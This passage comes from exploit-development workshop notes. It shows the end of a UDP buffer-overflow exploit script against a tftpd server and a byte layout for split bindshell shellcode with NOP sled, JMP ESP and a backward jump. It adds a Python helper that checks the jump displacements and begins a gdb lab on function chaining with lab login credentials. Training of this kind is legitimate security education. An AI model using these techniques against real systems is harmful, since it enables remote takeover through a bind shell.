1625. # buf = "\x00\x01" # receive command
1626. 
1627. # buf += "A" * 300 + "\x00"
1628. 
1629. sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # tftpd listens on UDP
1630. 
1631. try:
1632.     sock.connect((target, port))
1633.     sock.sendall(buf)
1634. except Exception as e:
1635.     sys.stderr.write("Cannot send to "+str(target)+" : "+str(port)+" : "+str(e)+"!\n")
1636. finally:
1637.     sock.close()
1638. sys.stderr.write("Sent.\n")
  1639.  
  1640.  
  1641.  
  1642. -----------------------------------------------------------------------------------------------------------------
  1643.  
  1644.  
  1645.  
  1646.  
1647. How does all of this actually work
1648. 
1649. 
1650. Total shellcode length: 315
1651. 
1652. Part1: 150
1653. Part2: 165
1654. 
1655. 
1656. NOPS * (256 - 165)
1657. 
1658. 91 NOPS + (165 bytes shellcode p2)              -> offset 256
1659.   + JMP ESP (4 bytes)                            -> offset 260
1660.   + Stack Shift (-1000) + (150 bytes shellcode p1) -> offset 410
1661.   + (neg jmp -380)
1662. 
1663. The negative jump at the end goes back to the 30 byte mark, into the NOPs in front of part 2,
1664. so execution slides into part 2 right after part 1 has finished.
  1666.  
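The negative jumps in Lab 2b (jmp_min) and Lab 2c (the trailing JMP -380) both depend on getting a relative displacement right, so here is an added example, not one of the workshop's scripts, that encodes and decodes x86 short and near jumps and then checks where the final tftpd buffer's jump lands. The part lengths are counted from the part1/part2 byte strings above: 151 and 166 bytes, 317 in total, which is the size wc -c reported for bindshell.bin. The field order mirrors the `buf +=` lines of the final script; the offsets assume the server copies the request contiguously, as the lab's diagram does.

```python
# Added example, not part of the lab files: relative-jump helpers and a layout check
# for the tftpd buffer. Lengths are counted from the byte strings on this page.
import struct

PART1_LEN = 151          # bytes in part1 (through the push ebx at 0x96)
PART2_LEN = 166          # bytes in part2 (0x97 through 0x13c)
SHIFTER_LEN = 7          # add esp,-1001h (6 bytes) + inc esp (1 byte)
JMP_BACK = -380          # displacement of the trailing near jump


def jmp_rel8(delta):
    """Short jump (EB rel8); delta is relative to the end of the 2-byte instruction."""
    return b"\xEB" + struct.pack("<b", delta)


def jmp_rel32(delta):
    """Near jump (E9 rel32); delta is relative to the end of the 5-byte instruction."""
    return b"\xE9" + struct.pack("<i", delta)


def decode_jmp(code):
    """Displacement encoded by the short or near jmp at the start of `code`."""
    if code[0] == 0xEB:
        return struct.unpack("<b", code[1:2])[0]
    if code[0] == 0xE9:
        return struct.unpack("<i", code[1:5])[0]
    raise ValueError("not a jmp rel8/rel32")


def jump_target(jmp_offset, code):
    """Offset the jmp at `jmp_offset` transfers control to (offsets within one buffer)."""
    length = 2 if code[0] == 0xEB else 5
    return jmp_offset + length + decode_jmp(code)


def tftpd_layout(part1_len=PART1_LEN, part2_len=PART2_LEN, jmp_back=JMP_BACK):
    """Field -> (offset, length) for the final tftpd buffer, plus the offset the
    trailing jump lands on, all relative to the start of the UDP payload."""
    fields = [
        ("opcode", 2),                 # "\x00\x01" read request
        ("nops", 256 - part2_len),     # NOP sled
        ("part2", part2_len),          # shellcode part 2
        ("eip", 4),                    # JMP ESP address
        ("shifter", SHIFTER_LEN),      # stack shifter
        ("part1", part1_len),          # shellcode part 1
        ("jmp", 5),                    # E9 rel32 back into the sled
        ("end", 1),                    # terminating "\x00"
    ]
    layout, off = {}, 0
    for name, size in fields:
        layout[name] = (off, size)
        off += size
    landing = jump_target(layout["jmp"][0], jmp_rel32(jmp_back))
    return layout, landing


def lands_in_sled(layout, landing):
    """True if the backwards jump lands inside the NOP sled, i.e. before part2."""
    start, size = layout["nops"]
    return start <= landing < start + size


if __name__ == "__main__":
    layout, landing = tftpd_layout()
    for name, (off, size) in layout.items():
        print("%-8s offset %3d length %3d" % (name, off, size))
    print("jmp -380 lands at offset %d, in sled: %s" % (landing, lands_in_sled(layout, landing)))
    print("Lab 2b jmp_min displacement:", decode_jmp(b"\xE9\x98\xEF\xFF\xFF"))   # -4200
```

With the byte counts from the page, the jump lands at offset 45, 47 bytes before part 2 and well inside the 90-byte sled, so the slide reaches part 2 whichever way the lengths are rounded. Changing PART2_LEN or JMP_BACK and re-running the check is the quickest way to see how much slack the layout actually has before the jump would land past the sled.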
  1667.  
  1668.  
  1669.  
  1670.  
  1671. =================================================================================
  1672.  
  1673.  
  1674. ##############################
  1675. # Intro to function chaining #
  1676. ##############################
  1677. ssh into 192.168.1.117
  1678. username: exploitlab
  1679. password: exploitlab
  1680.  
  1681.  
  1682. ---------------------------Type This-----------------------------------
  1683. cd /home/exploitlab
  1684. cat victim2.c
  1685. make victim2
  1686. ./victim2 AAAAAAAAAAAAA
  1687. -----------------------------------------------------------------------
  1688.  
  1689.  
  1690.  
  1691. ---------------------------Type This-----------------------------------
  1692. gdb victim2
  1693. disassemble main
  1694.  
  1695. break *0x080483cb
  1696.  
  1697. run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  1698. -----------------------------------------------------------------------
  1699.  
  1700.  
  1701. ---------------------------Type This-----------------------------------
  1702. bt
  1703. x/i $eip
  1704. x/64x $esp
  1705.  
  1706.  
  1707. quit
  1708. -----------------------------------------------------------------------
  1709.  
  1710.  
  1711.  
  1712.  
  1713. ---------------------------Type This-----------------------------------
  1714. cat frame1.pl
  1715. export EGG=`./frame1.pl`
  1716. gdb victim2
  1717. (gdb) run $EGG
  1718. -----------------------------------------------------------------------
  1719.  
  1720.  
  1721.  
  1722.  
  1723.  
  1724. x/100i 0x80484a5 (looking for a pop/pop/ret)
  1725. quit
  1726. cat frame2.pl
  1727. export EGG=`./frame2.pl`
  1728. gdb victim2
  1729. run $EGG
  1730.  
  1731.  
  1732. stepi